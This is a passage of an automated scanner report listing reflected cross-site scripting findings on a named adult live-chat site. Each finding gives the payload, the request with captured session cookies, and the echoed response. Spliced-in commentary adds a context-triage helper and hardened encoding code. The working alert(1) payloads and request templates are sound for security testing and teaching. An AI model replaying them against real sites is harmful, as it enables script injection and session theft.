Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:05 GMT
Connection: close
Content-Length: 49672
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/orgies/?4b235"><a>bd631be4c53=1">
...[SNIP]...

2.105. http://imlive.com/live-sex-chats/pornstars/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/pornstars/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd6ca'-alert(1)-'66a39635b46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/pornstars/?dd6ca'-alert(1)-'66a39635b46=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:42 GMT
Connection: close
Content-Length: 266553
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/pornstars/?dd6ca'-alert(1)-'66a39635b46=1&qs=cat=1^roomid=249^dd6ca'-alert(1)-'66a39635b46=1&qs=cat=1^roomid=249^dd6ca'-alert(1)-'66a39635b46=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63
...[SNIP]...

2.106. http://imlive.com/live-sex-chats/pornstars/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/pornstars/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad2c2"><a>388c8c895ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/pornstars/?ad2c2"><a>388c8c895ab=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:36 GMT
Connection: close
Content-Length: 266390
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/pornstars/?ad2c2"><a>388c8c895ab=1">
...[SNIP]...

2.107. http://imlive.com/live-sex-chats/role-play/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/role-play/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43819"><a>7fb20b0957a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/role-play/?43819"><a>7fb20b0957a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:34 GMT
Connection: close
Content-Length: 53900
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/role-play/?43819"><a>7fb20b0957a=1">
...[SNIP]...

2.108. http://imlive.com/live-sex-chats/role-play/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/role-play/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27f69'-alert(1)-'603afae0b8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/role-play/?27f69'-alert(1)-'603afae0b8e=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:44 GMT
Connection: close
Content-Length: 54077
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/role-play/?27f69'-alert(1)-'603afae0b8e=1&qs=cat=1^roomid=-999^27f69'-alert(1)-'603afae0b8e=1&qs=cat=1^roomid=-999^27f69'-alert(1)-'603afae0b8e=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d
...[SNIP]...

2.109. http://imlive.com/live-sex-chats/sex-show-galleries/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-galleries/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34839"><a>e84c423b110 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
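The report grades findings like this one "Firm" and the single-quoted script-string findings "Certain", and the difference is purely the context the echoed payload lands in. The following triage helper is an added example, not part of the scanner report or of the site's code: it locates every verbatim reflection of a payload in a response body, works out whether it sits in a JavaScript string, JavaScript code, a quoted attribute, a tag, or text, and notes whether the payload carries the delimiter that closes that context. The two response bodies are constructed to mirror the snippets shown in this report (the analytic.imlive.com beacon and the dAccess() language link); they are not the captured responses, and the function names are this example's own.

```javascript
// Added example, not part of the scanner report or the site's code: triage of
// reflected payloads by syntactic context. Constructed response fragments below
// mirror the report's snippets; they are not the captured responses.

const PAYLOAD_JS   = "cd9ca'-alert(1)-'52f7516f46a";   // parameter name from issue 2.110
const PAYLOAD_ATTR = '34839"><a>e84c423b110';          // parameter name from issue 2.109

const RESPONSE_SCRIPT = '<html><head><script type="text/javascript">try{var imgSrc=\'http://analytic.imlive.com/w.gif?pe=/content.aspx&ul=/live-sex-chats/sex-show-galleries/?'
  + PAYLOAD_JS + '=1&ld=701\';}catch(e){};</script></head><body></body></html>';

const RESPONSE_LINK = '<html><body><a class="en" title="English" href="http://imlive.com/" onclick="dAccess(\'http://imlive.com/live-sex-chats/sex-show-galleries/?'
  + PAYLOAD_ATTR + '=1\');return false;" lang="en-US" hreflang="en-US">English</a></body></html>';

// Index just past the <script ...> tag enclosing pos, or -1 when pos is not in a script body.
// ASCII lowercasing keeps offsets aligned with the original string.
function scriptBodyStart(html, pos) {
  const before = html.slice(0, pos).toLowerCase();
  const open = before.lastIndexOf('<script');
  if (open === -1 || before.lastIndexOf('</script') > open) return -1;
  const tagEnd = before.indexOf('>', open);
  return tagEnd === -1 ? -1 : tagEnd + 1;
}

// Which string delimiter, if any, is still open at the end of this JavaScript source.
// Deliberately small: it handles backslash escapes but not comments or regex literals.
function openJsQuote(code) {
  let quote = null;
  for (let i = 0; i < code.length; i++) {
    const c = code[i];
    if (quote) {
      if (c === '\\') i++;              // skip the escaped character
      else if (c === quote) quote = null;
    } else if (c === '"' || c === "'" || c === '`') {
      quote = c;
    }
  }
  return quote;
}

// HTML-level context at pos: text, inside a tag, or inside a quoted attribute value.
function htmlContext(html, pos) {
  const before = html.slice(0, pos);
  const lt = before.lastIndexOf('<');
  if (lt === -1 || before.lastIndexOf('>') > lt) return { context: 'html-text' };
  let quote = null;
  for (const c of before.slice(lt)) {
    if (quote) { if (c === quote) quote = null; }
    else if (c === '"' || c === "'") quote = c;
  }
  return quote ? { context: 'html-attribute', quote } : { context: 'html-tag' };
}

// One entry per verbatim reflection: offset, enclosing context, and whether the
// payload contains the character that closes that context.
function assessReflections(html, payload) {
  const findings = [];
  for (let pos = html.indexOf(payload); pos !== -1; pos = html.indexOf(payload, pos + payload.length)) {
    const start = scriptBodyStart(html, pos);
    let f;
    if (start !== -1) {
      const q = openJsQuote(html.slice(start, pos));
      f = q ? { context: 'js-string', quote: q } : { context: 'js-code' };
    } else {
      f = htmlContext(html, pos);
    }
    f.offset = pos;
    f.breaksOut = f.context === 'js-code'
      || (f.quote ? payload.includes(f.quote)
        : f.context === 'html-tag' ? /[\s>]/.test(payload)
        : payload.includes('<'));
    findings.push(f);
  }
  return findings;
}

// Map a finding onto the confidence language the report uses.
function verdict(f) {
  if (!f.breaksOut) return 'reflected but contained';
  if (f.context === 'js-string' || f.context === 'js-code') return 'Certain: arbitrary JavaScript';
  return 'Firm: new HTML content; script execution needs manual follow-up';
}
```

Run `assessReflections(RESPONSE_SCRIPT, PAYLOAD_JS)` and `assessReflections(RESPONSE_LINK, PAYLOAD_ATTR)` to see the two gradings side by side. Note that the link case is really two nested contexts, a JavaScript string inside an onclick attribute; the helper reports only the outer attribute context, which is exactly what this report's "Firm" description says. To go one level deeper you would HTML-decode the attribute value and run openJsQuote() on it.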

Request

GET /live-sex-chats/sex-show-galleries/?34839"><a>e84c423b110=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:02 GMT
Connection: close
Content-Length: 29751
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-show-galleries/?34839"><a>e84c423b110=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.110. http://imlive.com/live-sex-chats/sex-show-galleries/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-galleries/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd9ca'-alert(1)-'52f7516f46a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
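The two sinks this report keeps finding are the analytic.imlive.com beacon, which splices the request URL into a single-quoted JavaScript string, and the language-switch link, whose onclick handler carries the same URL inside a double-quoted attribute. The block below is an added example, not code from the scanner report or from the site: it rebuilds both sinks the way the captured responses imply (raw concatenation), then with context-aware output encoding, and runs the resulting script and handler with alert() and dAccess() stubbed so the difference is observable. Paths, the beacon host and the dAccess() name come from the report; the request objects, the builder functions, runBeacon() and runLinkHandler() are this example's own assumptions.

```javascript
// Added example (not from the scanner report or the site's own code): the two
// sinks shown in the report, vulnerable and hardened, with a harness that runs
// the generated script/handler the way a browser would. Request objects,
// builder names and the harness are this example's assumptions.

const PAYLOAD_JS   = "cd9ca'-alert(1)-'52f7516f46a";   // parameter name from issue 2.110
const PAYLOAD_ATTR = '34839"><a>e84c423b110';          // parameter name from issue 2.109

// Constructed requests: the payload is the parameter *name*, as in the report.
const reqJs   = { host: 'imlive.com', path: '/live-sex-chats/sex-show-galleries/', rawQuery: PAYLOAD_JS + '=1' };
const reqAttr = { host: 'imlive.com', path: '/live-sex-chats/sex-show-galleries/', rawQuery: PAYLOAD_ATTR + '=1' };
const requestUrl = (req) => req.path + '?' + req.rawQuery;

// ---- Vulnerable: the shape of the captured responses -------------------------
function beaconVulnerable(req) {
  return '<script type="text/javascript">try{var imgSrc=\'http://analytic.imlive.com/w.gif?ul='
       + requestUrl(req) + '\';}catch(e){};</script>';
}
function linkVulnerable(req) {
  return '<a class="en" title="English" href="http://imlive.com/" onclick="dAccess(\'http://'
       + req.host + requestUrl(req) + '\');return false;">';
}

// ---- Encoders, one per context -----------------------------------------------
// JavaScript string literal: JSON.stringify escapes quotes, backslashes and control
// characters; the second pass turns < > & and the line terminators U+2028/U+2029
// into \uXXXX, so the literal can never close a <script> element or confuse an
// HTML parser wherever it is later embedded.
function jsStringLiteral(s) {
  return JSON.stringify(s).replace(/[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}
// Double-quoted HTML attribute value.
function htmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// ---- Hardened ----------------------------------------------------------------
function beaconHardened(req) {
  // The URL is a query-string value inside a JS string: percent-encode it for the
  // URL, then emit it as a proper literal instead of pasting it between quotes.
  // encodeURIComponent() alone is not a fix: it leaves ' ( ) - untouched, so the
  // report's single-quote payload passes through it byte for byte.
  const literal = jsStringLiteral(encodeURIComponent(requestUrl(req)));
  return '<script type="text/javascript">try{var imgSrc="http://analytic.imlive.com/w.gif?ul="+'
       + literal + ';}catch(e){};</script>';
}
function linkHardened(req) {
  // Two nested contexts: a JS string inside an HTML attribute. Encode for the inner
  // context first (JS literal), then for the outer one (attribute); the browser
  // decodes the entities before the JS engine sees the handler.
  const literal = jsStringLiteral('http://' + req.host + requestUrl(req));
  return '<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('
       + htmlAttr(literal) + ');return false;">';
}

// ---- Harness: run the beacon script with alert() stubbed -----------------------
// Returns { fired, imgSrc }; fired is true when injected code reached alert().
function runBeacon(scriptHtml) {
  const body = scriptHtml.slice(scriptHtml.indexOf('>') + 1, scriptHtml.indexOf('</script>'));
  let fired = false;
  const alert = () => { fired = true; return 0; };
  const imgSrc = new Function('alert', body + ';return imgSrc;')(alert);
  return { fired, imgSrc };
}

// ---- Harness: run the onclick handler as the JS engine would receive it -------
// The attribute value ends at the first raw double quote (as in a browser), its
// entities are decoded (only those htmlAttr() emits), and dAccess() is stubbed.
// Returns the URL the handler passed to dAccess().
function runLinkHandler(linkHtml) {
  const m = /onclick="([^"]*)"/.exec(linkHtml);
  const src = m[1].replace(/&(amp|lt|gt|quot|#39);/g,
    (_, e) => ({ amp: '&', lt: '<', gt: '>', quot: '"', '#39': "'" }[e]));
  let url = null;
  new Function('dAccess', src)((u) => { url = u; });
  return url;
}
```

With the report's 2.110 payload, runBeacon(beaconVulnerable(reqJs)) reports fired === true while the hardened beacon yields the intended, percent-encoded imgSrc; with the 2.109 payload the vulnerable handler is cut off at the injected quote and fails to parse, while runLinkHandler(linkHardened(reqAttr)) hands dAccess() the original URL intact. The cleaner design is to keep user data out of inline handlers altogether (an attribute-encoded data- attribute read by a listener attached from script) and to rebuild the beacon query from parsed parameters rather than from the raw request URL.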

Request

GET /live-sex-chats/sex-show-galleries/?cd9ca'-alert(1)-'52f7516f46a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
